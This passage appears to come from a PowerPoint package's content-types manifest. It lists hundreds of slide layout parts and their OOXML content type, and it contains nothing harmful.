  <Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout500.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout501.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout502.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout503.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout504.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout505.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout506.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout507.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout508.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout509.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout510.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout511.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout512.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout513.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout514.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout515.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout516.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout517.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout518.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout519.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout520.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout521.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout522.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout523.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout524.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout525.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout526.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout527.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout528.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout529.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout530.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout531.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout532.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout533.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout534.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout535.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout536.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout537.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout538.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout539.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout540.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout541.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout542.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout543.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout544.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout545.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout546.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout547.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout548.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout549.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout550.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout551.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout552.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout553.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout554.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout555.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout556.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout557.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout558.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout559.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout560.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout561.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout562.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout563.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout564.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout565.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout566.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout567.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout568.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout569.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout570.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout571.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout572.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout573.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout574.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout575.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout576.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout577.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout578.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout579.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout580.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout581.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout582.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout583.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout584.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout585.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout586.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout587.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout588.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout589.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout590.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout591.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout592.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout593.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout594.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout595.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout596.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout597.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout598.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout599.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout600.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout601.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout602.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout603.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout604.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout605.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout606.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout607.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout608.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout609.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout610.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout611.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout612.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout613.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout614.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout615.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout616.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout617.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout618.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout619.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout620.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout621.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout622.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout623.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout624.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout625.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout626.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout627.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout628.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout629.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout630.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout631.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout632.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout633.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout634.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout635.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout636.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout637.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout638.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout639.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout640.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout641.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout642.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout643.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout644.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout645.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout646.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout647.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout648.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout649.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout65.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout650.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout651.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout652.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout653.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout654.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout655.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout656.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout657.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout658.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout659.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout66.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout660.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout661.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout662.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout663.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout664.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout665.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout666.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout667.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout668.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout669.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout670.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout671.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout672.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout673.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout674.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout675.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout676.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout677.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout678.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout679.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout680.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout681.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout682.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout683.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout684.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout685.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout686.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout687.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout688.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout689.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout690.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout691.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
